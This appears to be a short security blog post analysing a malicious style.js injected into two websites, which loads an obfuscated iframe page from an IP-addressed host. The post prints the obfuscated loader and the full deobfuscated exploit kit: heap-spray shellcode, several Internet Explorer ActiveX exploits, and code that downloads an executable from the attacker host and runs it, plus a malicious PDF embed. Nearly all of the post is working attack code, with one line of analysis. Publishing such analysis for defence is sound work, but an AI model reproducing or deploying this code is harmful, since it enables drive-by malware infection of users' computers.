www.wmpd.ru/style.js and www.mtno.ru/style.js

Style.js embeds an iframe to http://79.135.168.18
The index.html page of the iframe contains another obfuscation method.
Content of index.html:
<html><body><object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object><div id='pdfplace'></div><div style="display:none;" id="ipitpnNoyEI">vj7'+'MpNIq0Gv'+'OUCdosbw9BH'+'mRpNI'+'q0bcq4HmPQMw'+'9QqI'+'M2j7M'+'gQ_r'+'ttmqBNdrQCu9tfxo'+'kBvPB'+'OW'+'M2j7M'+'gQ_rt'+'iuqXHyitiw'+'9XH@v4'+'Gv'+
[snip]
'+'jb</div><script>function iUgeFWr3jPzcx(XXWiRBF){return String["f"+"rom"+"Ch"+"ar"+"Code"](XXWiRBF);}</script><script>function r3afWyrBdHK7(Ts4xlLlk){var IX1VaGCz5Ty=0,wlle40xMFiPpN=Ts4xlLlk.length,mE8RVSYLmRPkC=1024,Hx8Jitym4w,OeY93Tw,dNn4v9qMXa="",U7WQQFJ=IX1VaGCz5Ty,zMLAf=IX1VaGCz5Ty,jn3CjJn87q4F=IX1VaGCz5Ty,nnHz7NVWn=Array(63,52,21,18,61,48,56,17,54,30,0,0,0,0,0,0,3,10,57,9,24,16,62,33,49,38,14,36,31,5,37,29,26,53,13,46,32,51,50,34,43,45,59,0,0,0,0,39,0,44,1,35,7,11,4,42,25,8,20,40,12,6,41,15,58,28,27,47,60,55,22,23,2,19,0);for(OeY93Tw=Math.ceil(wlle40xMFiPpN/mE8RVSYLmRPkC);OeY93Tw>IX1VaGCz5Ty;OeY93Tw--){for(eval("Hx8Jitym4w=M"+"a"+"th."+"m"+"in(wlle40xMFiPpN,mE8RVSYLmRPkC)");Hx8Jitym4w>IX1VaGCz5Ty;Hx8Jitym4w--,wlle40xMFiPpN--){jn3CjJn87q4F|=(nnHz7NVWn[Ts4xlLlk.charCodeAt(U7WQQFJ++)-48])<<zMLAf;if(zMLAf){dNn4v9qMXa+=iUgeFWr3jPzcx(28^jn3CjJn87q4F&255);jn3CjJn87q4F>>=8;zMLAf-=2;}else{zMLAf=6;}}}return (dNn4v9qMXa);}var uCmCYwsXffarP=document.getElementById('ipitpnNoyEI').innerHTML.replace("'+'","");for(var ah=0;ah<(uCmCYwsXffarP.length);ah++){uCmCYwsXffarP=uCmCYwsXffarP.replace("'+'","");}eval(r3afWyrBdHK7(uCmCYwsXffarP));</script></body></html>

The malicious script is now embedded within the <div> tag.

A quick analysis, resulting in a few replacement of the code would yield the plain code:

function sleep(func,naptime){
var sleeping = true;
var now = new Date();
var alarm;
var startingMSeconds = now.getTime();
while(sleeping){
alarm = new Date();
alarmMSeconds = alarm.getTime();
if (alarmMSeconds - startingMSeconds > naptime){ sleeping = false; }
}
eval(func);
}

var m=new Array();
var mf=0;
var url="http://79.135.168.18/load.php?id=62288";

function hex(num,width){
var digits="0123456789ABCDEF";
var hex=digits.substr(num&0xF,1);
while(num>0xF){
num=num>>>4;
hex=digits.substr(num&0xF,1)+hex;
}
var width=(width?width:0);
while(hex.length<width)hex="0"+hex;
return hex;
}

function addr(addr){
return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));
}

function unes(str){
var tmp="";
for(var i=0;i<str.length;i+=4){
tmp+=addr((str.charCodeAt(i+3)<<24)+
(str.charCodeAt(i+2)<<16)+
(str.charCodeAt(i+1)<<8)+
str.charCodeAt(i));
}
return unescape(tmp);
}

function hav(){
mf=mf;
setTimeout("hav()",1000);
}

function gss(ss,sss){
while(ss.length*2<sss)ss+=ss;
ss=ss.substring(0,sss/2);
return ss;
}

function ms(xpl){
var plc=unes(
"\x43\x43\x43\x43\x43\x43\xEB\x0F\x5B\x33\xC9\x66\xB9\x80\x01\x80"+
"\x33\xEF\x43\xE2\xFA\xEB\x05\xE8\xEC\xFF\xFF\xFF\x7F\x8B\x4E\xDF"+
"\xEF\xEF\xEF\x64\xAF\xE3\x64\x9F\xF3\x42\x64\x9F\xE7\x6E\x03\xEF"+
"\xEB\xEF\xEF\x64\x03\xB9\x87\x61\xA1\xE1\x03\x07\x11\xEF\xEF\xEF"+
"\x66\xAA\xEB\xB9\x87\x77\x11\x65\xE1\x07\x1F\xEF\xEF\xEF\x66\xAA"+
"\xE7\xB9\x87\xCA\x5F\x10\x2D\x07\x0D\xEF\xEF\xEF\x66\xAA\xE3\xB9"+
"\x87\x00\x21\x0F\x8F\x07\x3B\xEF\xEF\xEF\x66\xAA\xFF\xB9\x87\x2E"+
"\x96\x0A\x57\x07\x29\xEF\xEF\xEF\x66\xAA\xFB\xAF\x6F\xD7\x2C\x9A"+
"\x15\x66\xAA\xF7\x06\xE8\xEE\xEF\xEF\xB1\x66\x9A\xCB\x64\xAA\xEB"+
"\x85\xEE\xB6\x64\xBA\xF7\xB9\x07\x64\xEF\xEF\xEF\xBF\x87\xD9\xF5"+
"\xC0\x9F\x07\x78\xEF\xEF\xEF\x66\xAA\xF3\x64\x2A\x6C\x2F\xBF\x66"+
"\xAA\xCF\x87\x10\xEF\xEF\xEF\xBF\x64\xAA\xFB\x85\xED\xB6\x64\xBA"+
"\xF7\x07\x8E\xEF\xEF\xEF\xEC\xAA\xCF\x28\xEF\xB3\x91\xC1\x8A\x28"+
"\xAF\xEB\x97\x8A\xEF\xEF\x10\x9A\xCF\x64\xAA\xE3\x85\xEE\xB6\x64"+
"\xBA\xF7\x07\xAF\xEF\xEF\xEF\x85\xE8\xB7\xEC\xAA\xCB\xDC\x34\xBC"+
"\xBC\x10\x9A\xCF\xBF\xBC\x64\xAA\xF3\x85\xEA\xB6\x64\xBA\xF7\x07"+
"\xCC\xEF\xEF\xEF\x85\xEF\x10\x9A\xCF\x64\xAA\xE7\x85\xED\xB6\x64"+
"\xBA\xF7\x07\xFF\xEF\xEF\xEF\x85\x10\x64\xAA\xFF\x85\xEE\xB6\x64"+
"\xBA\xF7\x07\xEF\xEF\xEF\xEF\xAE\xB4\xBD\xEC\x0E\xEC\x0E\xEC\x0E"+
"\xEC\x0E\x6C\x03\xEB\xB5\xBC\x64\x35\x0D\x18\xBD\x10\x0F\xBA\x64"+
"\x03\x64\x92\xE7\x64\xB2\xE3\xB9\x64\x9C\xD3\x64\x9B\xF1\x97\xEC"+
"\x1C\xB9\x64\x99\xCF\xEC\x1C\xDC\x26\xA6\xAE\x42\xEC\x2C\xB9\xDC"+
"\x19\xE0\x51\xFF\xD5\x1D\x9B\xE7\x2E\x21\xE2\xEC\x1D\xAF\x04\x1E"+
"\xD4\x11\xB1\x9A\x0A\xB5\x64\x04\x64\xB5\xCB\xEC\x32\x89\x64\xE3"+
"\xA4\x64\xB5\xF3\xEC\x32\x64\xEB\x64\xEC\x2A\xB1\xB2\x2D\xE7\xEF"+
"\x07\x1B\x11\x10\x10\xBA\xBD\xA3\xA2\xA0\xA1\xEF"+url+xpl);
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
if (mf){
for (i=0;i<hb;i++)delete m[i];
CollectGarbage();
}
for(i=0;i<hb;i++)m[i]=ss+plc;
if(!mf){
mf=1;
hav();
}
return 0;
}

function cobj(obj){
var ret=null;
if(obj.substring(0,1)=="{"){
try{
var clsid=obj.substring(1,obj.length-1);
ret=document.createElement("object");
ret.setAttribute("classid","clsid:"+clsid);
return ret;
}catch(e){
return null;
}
}else{
try{
ret=new ActiveXObject(obj);
return ret;
}catch(e){
return null;
}
}
}

var padding = "AAAA";
var heapBase = 0x00150000;
var memo;

function init(maxAlloc){
while (4 + padding.length*2 + 2 < 65535)padding += padding;
memo = new Array();
flush();
}

function flush(){
delete memo["plunger"];
CollectGarbage();
memo["plunger"] = new Array();
var bytes = new Array(32, 64, 256, 32768);
for (var i = 0; i < 6; i++) {
for(var n = 0; n < 4; n++) {
var len = memo["plunger"].length;
eval("memo[\"plunger\"][len] = padding.substr(0, (" + bytes[n] + "-6)/2);");
}
}
}

function alloc(arg, tag){
var size;
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag] )memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = padding.substr(0, (arg-6)/2);
}

function alloc_str(arg, tag){
var size;
size = 4 + arg.length*2 + 2;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag])memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = arg.substr(0, arg.length);
}

function free(tag) {
delete memo[tag];
CollectGarbage();
flush();
}

function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}

function Go(a){
var eurl=url+"&spl=7";
var fname="winNOFZCyliz5mmRR.exe";
var fso=a.CreateObject("Scripting.FileSystemObject","")
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
x.Mode=3;
try{nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.XMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.ServerXMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",eurl,false);}
catch(e){return 0;}}}}
x.Type=1;
nl.send(null);
rb=nl.responseBody;
x.Open();
x.Write(rb);
x.SaveTofile(fname,2);
sap.ShellExecute(fname);
return 1;
}

function attack(s){
var obj=null;

if(s==1){
var i=0;
var target=new Array("BD96C556-65A3-11D0-983A-00C04FC29E36","BD96C556-65A3-11D0-983A-00C04FC29E30","AB9BCEDD-EC7E-47E1-9322-D4A210617116","0006F033-0000-0000-C000-000000000046","0006F03A-0000-0000-C000-000000000046","6e32070a-766d-4ee6-879c-dc1fa91d2fc3","6414512B-B978-451D-A0D8-FCFDF33E833C","7F5B7F63-F06F-4331-8A26-339E03C0AE3D","06723E09-F4C2-43c8-8358-09FCD1DB0766","639F725F-1B2D-4831-A9FD-874847682010","BA018599-1DB3-44f9-83B4-461454C84BF8","D0C07D56-7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF-CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute("classid","clsid:"+target[i]);
if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}
i++;
}
sleep("attack(4);",4000);
return 0;
}

if(s==3){
try{
obj=cobj("WebViewFolderIcon.WebViewFolderIcon.1");
if(obj){
ms("&spl=8");
for(var i=0;i<128;i++){
var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
try{wvfio.setSlice(0x7ffffffe,0,0,202116108);}catch(e){}
var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
}
sleep("attack(7);",2000);
return 0;
}
}catch(e){}
sleep("attack(7);",1);
return 0;
}

if(s==4){
try{
obj=cobj("{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}");
if(obj){
ms("&spl=9");
z=Math.ceil(0x0c0c0c0c);
z=document.scripts[0].createControlRange().length;
sleep("attack(3);",2000);
return 0;
}
}catch(e){}
sleep("attack(3);",1);
return 0;
}

if(s==7){
try{
obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
if(obj){
ms("&spl=10");
var buf = "";
while (buf.length < 5000) buf += "\x0c\x0c\x0c\x0c";
obj.SetFormatLikeSample(buf);
sleep("attack(9);",2000);
return 0;
}
}catch(e){}
sleep("attack(9);",1);
return 0;
}

if(s==9){
try{
obj=cobj("DirectAnimation.PathControl");
if(obj){
ms("&spl=11");
init();
var jmpecx = 0x0c0c0c0c;
var vtable = addr(0x7ceb9090);
for (var i = 0; i < 124/4; i++)vtable += addr(jmpecx);
vtable += padding.substr(0, (1008-138)/2);
var fakeObjPtr = heapBase + 0x688 + ((1008+8)/8)*48;
var fakeObjChunk = padding.substr(0, (0x200c-4)/2) + addr(fakeObjPtr) + padding.substr(0, 14/2);
CollectGarbage();
flush();
for (var i = 0; i < 100; i++)alloc_str(vtable);
alloc_str(vtable, "lookaside");
free("lookaside");
for (var i = 0; i < 100; i++)alloc(0x2010);
for (var i = 0; i < 2; i++) {
alloc_str(fakeObjChunk);
alloc_str(fakeObjChunk, "freeList");
}
alloc_str(fakeObjChunk);
free("freeList");
obj.KeyFrame(0x40000801, new Array(1), new Array(1));
sleep("attack(10);",2000);
return 0;
}
}catch(e){}
sleep("attack(10);",1);
return 0;
}
if(s==10){
snpac();
return 0;
}
}
function xml(){ }
attack(1);

function pdf(){
try {
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if (!obj) {obj = new ActiveXObject("PDF.PdfCtrl");}
if (obj) {document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://79.135.168.18/pdf.php?id=62288' type='application/pdf'></embed>";}
} catch(e) {
document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://79.135.168.18/pdf.php?id=62288' type='application/pdf'></embed>";
}
sleep("xml()", 3);
}

function snpac(){
var buf1 = 'http://79.135.168.18/load.php?id=62288&spl=4';
try{
var obj = document.createElement('object');
obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
obj.setAttribute("id", "obj");
obj.SnapshotPath = buf1;
obj.CompressedPath = 'C:\win32.exe';
obj.PrintSnapshot();
} catch(e) {}
sleep("pdf()", 1000);
}

The script is a collection of various exploits.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: